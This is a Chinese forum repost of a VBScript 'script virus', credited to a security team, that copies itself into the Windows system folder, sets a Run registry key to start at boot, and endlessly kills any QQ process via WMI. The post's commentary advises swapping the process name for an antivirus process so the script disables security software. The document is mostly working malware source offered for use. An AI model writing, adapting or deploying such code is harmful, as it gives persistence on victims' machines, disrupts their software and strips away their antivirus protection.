[转载]让程序不能启动的脚本病毒
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])原文标题:一个让QQ不能启动的脚本病毒
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\system.vbs")
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\system","system.vbs"
do
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = "qq.exe"")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
loop
把上面的qq.exe改成防病毒软件的进程命就能变成杀防火墙的病毒了
注:以上代码使用VB编译
这个脚本的原理是先杀掉QQ进程
然后在内存中一起循环运行,发现有名为qq.exe的进程便再次杀死
页:
[1]